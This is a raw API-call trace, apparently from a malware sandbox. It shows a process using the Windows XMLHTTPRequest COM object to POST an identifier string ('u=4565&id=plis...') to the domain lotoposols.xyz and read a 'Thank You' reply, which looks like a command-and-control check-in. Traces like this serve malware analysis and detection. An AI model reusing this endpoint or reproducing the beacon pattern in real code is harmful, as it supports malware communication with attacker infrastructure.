	[0140.781] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c760 | out: ppvObject=0x26c760*=0x0) returned 0x80004002
	[0140.781] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c760 | out: ppvObject=0x26c760*=0x0) returned 0x80004002
	[0140.781] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0140.781] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0140.781] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26d878 | out: ppvObject=0x26d878*=0x3cacc0) returned 0x0
	[0140.781] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), ppvObject=0x26d870 | out: ppvObject=0x26d870*=0x0) returned 0x80004002
	[0140.781] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0140.781] XMLHTTPRequest:IUnknown:Release (This=0x47a5b88) returned 0x0
	[0140.781] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d918 | out: ppvObject=0x26d918*=0x47a5aa0) returned 0x0
	[0140.781] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x3
	[0140.781] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x2
	[0140.781] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0140.781] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0140.782] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26dbf0 | out: ppvObject=0x26dbf0*=0x0) returned 0x80004002
	[0140.782] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26dd90*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26db44 | out: rgDispId=0x26db44*=1) returned 0x0
	[0140.784] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0140.784] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d8d0 | out: ppvObject=0x26d8d0*=0x0) returned 0x80004002
	[0140.784] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=1, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x26d8a8*(rgvarg=([0]=0x42be18*(varType=0xb, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x420000, varVal2=0x0), [1]=0x42be30*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42da90*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="https://lotoposols.xyz", varVal2=0x0), varVal2=0x0), [2]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d958*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="post", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0, puArgErr=0x26d8c0 | out: pDispParams=0x26d8a8*(rgvarg=([0]=0x42be18*(varType=0xb, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x420000, varVal2=0x0), [1]=0x42be30*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42da90*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="https://lotoposols.xyz", varVal2=0x0), varVal2=0x0), [2]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d958*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="post", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d8c0*=0x26dd90) returned 0x0
	[0140.785] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff44d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ce18 | out: ppvObject=0x26ce18*=0x0) returned 0x80004002
	[0140.785] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff426f70*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ce20 | out: ppvObject=0x26ce20*=0x0) returned 0x80004002
	[0140.785] XMLHTTPRequest:IUnknown:AddRef (This=0x3cacc0) returned 0x2
	[0140.785] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40c8070*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d000 | out: ppvObject=0x26d000*=0x3cacc0) returned 0x0
	[0140.785] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26be20 | out: ppvObject=0x26be20*=0x3cacc0) returned 0x0
	[0140.785] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26be58 | out: ppvObject=0x26be58*=0x0) returned 0x80004002
	[0140.785] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), riid=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x26be48 | out: ppvObject=0x26be48*=0x0) returned 0x80004002
	[0140.785] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26be18 | out: ppvObject=0x26be18*=0x0) returned 0x80004002
	[0140.785] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26be18 | out: ppvObject=0x26be18*=0x0) returned 0x80004002
	[0140.785] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0140.785] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26bef8 | out: ppvObject=0x26bef8*=0x0) returned 0x80004002
	[0140.785] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08c0*(Data1=0x118, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26bf08 | out: ppvObject=0x26bf08*=0x0) returned 0x80004002
	[0140.785] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26bef0 | out: ppvObject=0x26bef0*=0x3cacc0) returned 0x0
	[0140.786] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26bf20 | out: ppvObject=0x26bf20*=0x0) returned 0x80004002
	[0140.786] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26bef8 | out: ppvObject=0x26bef8*=0x0) returned 0x80004002
	[0140.786] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26bf00 | out: ppvObject=0x26bf00*=0x0) returned 0x80004002
	[0140.786] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26bf00 | out: ppvObject=0x26bf00*=0x0) returned 0x80004002
	[0140.786] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0140.786] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0140.786] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26d018 | out: ppvObject=0x26d018*=0x3cacc0) returned 0x0
	[0140.786] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), ppvObject=0x26d010 | out: ppvObject=0x26d010*=0x0) returned 0x80004002
	[0140.786] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0140.786] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0140.786] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26dbf0 | out: ppvObject=0x26dbf0*=0x0) returned 0x80004002
	[0140.786] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26dd90*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26db44 | out: rgDispId=0x26db44*=5) returned 0x0
	[0140.786] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0140.786] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d8d0 | out: ppvObject=0x26d8d0*=0x0) returned 0x80004002
	[0140.786] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=5, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x26d8a8*(rgvarg=([0]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d9c0*(varType=0x8, wReserved1=0xa, wReserved2=0x0, wReserved3=0x0, varVal1="u=4565&id=plis&k=4565&u=4565", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0, puArgErr=0x26d8c0 | out: pDispParams=0x26d8a8*(rgvarg=([0]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d9c0*(varType=0x8, wReserved1=0xa, wReserved2=0x0, wReserved3=0x0, varVal1="u=4565&id=plis&k=4565&u=4565", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d8c0*=0x26dd90) returned 0x0
	[0140.787] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26cf48 | out: ppvObject=0x26cf48*=0x3cacc0) returned 0x0
	[0140.787] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7feff837e20*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7feff837e20*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x5a62348 | out: ppvObject=0x5a62348*=0x0) returned 0x80004002
	[0140.787] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0140.787] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26ba48 | out: ppvObject=0x26ba48*=0x3cacc0) returned 0x0
	[0140.788] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7feff83f170*(Data1=0x4f9f9fcb, Data2=0xe0f4, Data3=0x48eb, Data4=([0]=0xb7, [1]=0xab, [2]=0xfa, [3]=0x2e, [4]=0xa9, [5]=0x36, [6]=0x5c, [7]=0xb4)), riid=0x7feff83f170*(Data1=0x4f9f9fcb, Data2=0xe0f4, Data3=0x48eb, Data4=([0]=0xb7, [1]=0xab, [2]=0xfa, [3]=0x2e, [4]=0xa9, [5]=0x36, [6]=0x5c, [7]=0xb4)), ppvObject=0x5a6a098 | out: ppvObject=0x5a6a098*=0x0) returned 0x80004002
	[0140.788] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0151.246] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0151.246] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26dbf8 | out: ppvObject=0x26dbf8*=0x0) returned 0x80004002
	[0151.246] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26dd10*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26db4c | out: rgDispId=0x26db4c*=10) returned 0x0
	[0151.246] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0151.246] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d8d0 | out: ppvObject=0x26d8d0*=0x0) returned 0x80004002
	[0151.246] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=10, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x26d8a8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be60, pExcepInfo=0x26d8f0, puArgErr=0x26d8c0 | out: pDispParams=0x26d8a8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="'Thank You: 26430", varVal2=0x0), pExcepInfo=0x26d8f0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d8c0*=0x26dd90) returned 0x0
	[0151.246] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0151.247] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d4a8 | out: ppvObject=0x26d4a8*=0x0) returned 0x80004002
	[0151.247] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26d5c0*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26d3fc | out: rgDispId=0x26d3fc*=7) returned 0x0
	[0151.247] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x3
	[0151.247] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d180 | out: ppvObject=0x26d180*=0x0) returned 0x80004002
	[0151.247] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=7, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18, pExcepInfo=0x26d1a0, puArgErr=0x26d170 | out: pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18*(varType=0x3, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xc8, varVal2=0x0), pExcepInfo=0x26d1a0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d170*=0x0) returned 0x0
	[0151.247] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x2
	[0151.247] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0151.248] malloc (_Size=0xa8) returned 0x3de0b0
	[0151.249] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d4a8 | out: ppvObject=0x26d4a8*=0x0) returned 0x80004002
	[0151.249] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26d5c0*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26d3fc | out: rgDispId=0x26d3fc*=7) returned 0x0
	[0151.249] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x3
	[0151.249] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d180 | out: ppvObject=0x26d180*=0x0) returned 0x80004002
	[0151.249] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=7, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18, pExcepInfo=0x26d1a0, puArgErr=0x26d170 | out: pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18*(varType=0x3, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xc8, varVal2=0x0), pExcepInfo=0x26d1a0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d170*=0xffffffff) returned 0x0
	[0151.249] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x2
	[0151.250] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x1
